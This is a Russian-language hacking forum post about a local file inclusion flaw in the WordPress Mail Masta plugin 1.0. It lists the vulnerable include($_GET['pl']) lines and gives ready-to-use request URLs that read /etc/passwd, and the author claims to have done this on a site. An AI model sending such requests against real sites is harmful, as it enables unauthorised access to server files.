РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Взлом WordPress - Mail Masta Plugin 1.0

Сообщения
191
Реакции
233
Баллы
58
Сегодня господа мы поговорим о LFI уязвимости в плагине Mail Masta Plugin 1.0 который используется в WordPress
Для начало разберемся что такое LFI
LFI - Local file include - это популярный и часто эксплуатируемый способ взлома сайтов и веб приложений.
LFI - это одна из самых опасных уязвимостей сайта.
Эксплуатация LFI представляет максимальную угрозу для атакуемого сайта, и практически во всех случаях приводит к его взлому.
LFI - это возможность использования локальных системных файлов сервера. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.
LFI - позволяет злоумышленнику выполнить или получить данные с локального файла.
LFI возникает в случае, когда проверка входящих данных и параметров в коде сайта отсутствует или недостаточна.
Возможность эксплуатации LFI (Remote file include) возникает из за грубейших ошибок разработки сайта, отсутствия фильтрации передающих параметров, а также некорректной настройки сервера.

Для примера:

http://site.ru/preview.php?file=example.html
http://site.ru/preview.php?file=../../../../etc/passwd

Уязвимые строки в плагине

Файл /inc/campaign/count_of_send.php
Строка 4 : include($_GET[’pl’]);

Файл /inc/lists/csvexport.php:
Строка 5: include($_GET[’pl’]);

Файл /inc/campaign/count_of_send.php
Строка 4: include($_GET[’pl’]);

Файл /inc/lists/csvexport.php
Строка 5: include($_GET[’pl’]);

Файл /inc/campaign/count_of_send.php
Строка 4: include($_GET[’pl’]);

Для примера возьмем сайт
http://sire.ru/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd






Как вы видите благодаря этому багу я получил доступ к файлы /etc/passwd
 
Сверху